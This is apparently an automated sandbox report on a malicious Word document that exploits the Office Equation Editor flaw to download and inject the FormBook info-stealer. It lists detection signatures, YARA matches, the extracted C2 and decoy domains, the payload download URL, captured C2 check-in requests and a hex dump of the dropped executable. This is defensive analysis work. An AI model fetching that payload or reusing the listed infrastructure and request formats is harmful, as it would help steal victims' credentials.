Windows Analysis Report OBL PN210700369.doc

Overview

General Information

Sample Name: OBL PN210700369.doc
Analysis ID: 491424
MD5: ee6900ee7f29ffb8b1c5f5b9a8a117d0
SHA1: 74501f04465f268c3f2bfea3b371118fe25b6aed
SHA256: 135dedf906bbb8eef7aef3b5966f1b933e65725cef80e653031481feb7351d62
Tags: docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.vaughnmethod.com/ed9s/"], "decoy": ["pocketoptioniraq.com", "merabestsolutions.com", "atelectronics.site", "fuxueshi.net", "infinitystay.com", "forensicconcept.site", "txpmachine.com", "masterwhs.xyz", "dia-gnwsis.art", "fulltiltnodes.com", "bigbnbbsc.com", "formation-figma.com", "bonanacroin.net", "medicalmarijuanasatx.com", "bagnavy.com", "aaegiscares.net", "presentationpublicschool.com", "bestyousite.site", "prescriptionn.com", "beyondthenormbouquets.com", "sinclairsparkes.com", "yesterdayglass.com", "lj-safe-keepinganwgt76.xyz", "winlegends.com", "perthvideoproduction.com", "sgh.technology", "athletik.biz", "cardealergame.com", "ugkhmel.xyz", "4346emerald.com", "soulconstructionservices.com", "dalmac-nj.com", "marylink.net", "gentciu.com", "insidecity.company", "wensum-creations.com", "frontwonline.com", "8xovz.xyz", "pickaxecoffee.com", "stonezhang.top", "markmra1995.site", "valleysettlewash.top", "canadabulkmushrooms.com", "shiningoutdoors.com", "elysiarv.xyz", "artoidmode.com", "whileloading.com", "crgcatherine.com", "usa111.com", "tourmalinesepiapirole.info", "infodf.xyz", "girldollg.xyz", "paypal-caseid581.com", "bymetronet.com", "outranky.com", "bankinsurance.site", "iscinterconnectsolutions.com", "networth.fyi", "fastplaycdn.xyz", "fernradio.com", "sergeantrandom.net", "islamic-coins.com", "naplesgolfcartbatteries2u.com", "seniormedicarebenefits.net"]}
Multi AV Scanner detection for submitted file
Source: OBL PN210700369.doc ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://lg-tv.tk/obinnazx.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe ReversingLabs: Detection: 17%
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.obinnamaxdw2962.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmmon32.pdb source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbr2v source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: obinnamaxdw2962.exe, cmmon32.exe

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: lg-tv.tk
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.islamic-coins.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.140.50 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.vaughnmethod.com/ed9s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== HTTP/1.1Host: www.islamic-coins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112 185.239.243.112
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 13:20:59 GMTContent-Type: application/x-msdownloadContent-Length: 854528Last-Modified: Mon, 27 Sep 2021 01:40:35 GMTConnection: keep-aliveETag: "61512113-d0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a5 12 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 70 0b 00 00 98 01 00 00 00 00 00 de 8f 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 8f 0b 00 4f 00 00 00 00 a0 0b 00 3c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 6f 0b 00 00 20 00 00 00 70 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 3c 94 01 00 00 a0 0b 00 00 96 01 00 00 72 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0d 00 00 02 00 00 00 08 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 8f 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 1c 53 02 00 03 00 00 00 8c 02 00 06 04 20 04 00 88 6f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /obinnazx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.452943975.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.428379026.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoi
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoq
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehped2
Source: explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp#
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: obinnamaxdw2962.exe, obinnamaxdw2962.exe, 00000005.00000000.424542782.00000000009E2000.00000020.00020000.sdmp, cmmon32.exe, 00000007.00000002.683308927.000000000261F000.00000004.00020000.sdmp, obinnamaxdw2962.exe.2.dr String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.428495981.000000000031D000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1J
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1b
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: cmmon32.exe, 00000007.00000002.683753040.0000000002B0F000.00000004.00020000.sdmp String found in binary or memory: https://www.netexplorer.fr/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A9A4A70D-764F-4C80-824C-4FCC7297AA70}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: lg-tv.tk
Source: global traffic HTTP traffic detected: GET /obinnazx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== HTTP/1.1Host: www.islamic-coins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe Jump to dropped file
.NET source code contains very large strings
Source: obinnamaxdw2962.exe.2.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.2.obinnamaxdw2962.exe.9e0000.3.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Yara signature match
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
